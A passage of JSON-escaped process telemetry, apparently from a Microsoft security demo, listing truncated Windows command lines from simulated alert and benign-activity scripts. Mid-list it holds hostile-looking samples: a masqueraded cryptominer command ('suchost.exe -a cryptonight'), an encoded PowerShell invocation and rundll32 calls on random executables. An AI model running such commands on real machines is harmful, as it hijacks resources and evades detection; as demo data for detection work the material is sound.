Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Em...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"cmdline unknown\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmdline unknown\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Begin Security Demo tasks\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; ianhelle@microsof...\",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.0...\",\".\\\\powershell -Noninteractive -Noprofile -Command ...\",\".\\\\powershell -enc LU5vbmludGVyYWN0aXZlIC1Ob3Byb2Z...\",\"cmd /c echo End Security Demo tasks\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\speech_onecore\\\\common\\\\SpeechMo...\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 8 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -10918 /...\",\"ping 127.0.0.1 -n 17 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 0 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6735 ...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\26415\\\\9105.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 14 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -17484...\",\"ping 127.0.0.1 -n 14 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 14 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 14 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 14 \",\"rundll32 \\\\15840\\\\26443.exe\",\"ping 127.0.0.1 -n 14 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 14 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 14 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 14 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 18 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 28 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\18091\\\\18975.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 26 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1926 ...\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10353...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\29395\\\\14699.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"rundll32 \\\\24535\\\\23154.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 26 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29592...\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"rundll32 \\\\12420\\\\28156.exe\",\"ping 127.0.0.1 -n 26 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 26 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 26 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 29 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 8 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 6 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -14404 /...\",\"ping 127.0.0.1 -n 25 \",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 8 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -23146 /...\",\"ping 127.0.0.1 -n 9 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 3 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20009...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\6038\\\\18193.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 11 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 29 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 20 \",\"ping 127.0.0.1 -n 22 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 2 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 2 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\AppHostRegistrationVerifier.ex...\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe StartScan\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate...\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinB...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"ping 127.0.0.1 -n 11 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -29451 /...\",\"ping 127.0.0.1 -n 18 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 19 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -...\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\Wi...\",\"cmd /c echo Any questions about the commands exec...\",\"cmd /c echo timb@microsoft.com; romead@microsoft....\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32357...\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"rundll32 \\\\557\\\\12356.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 16 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 26 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 12 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\di...\",\"ping 127.0.0.1 -n 6 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\d...\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\28294\\\\1236.exe\",\"ping 127.0.0.1 -n 24 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd 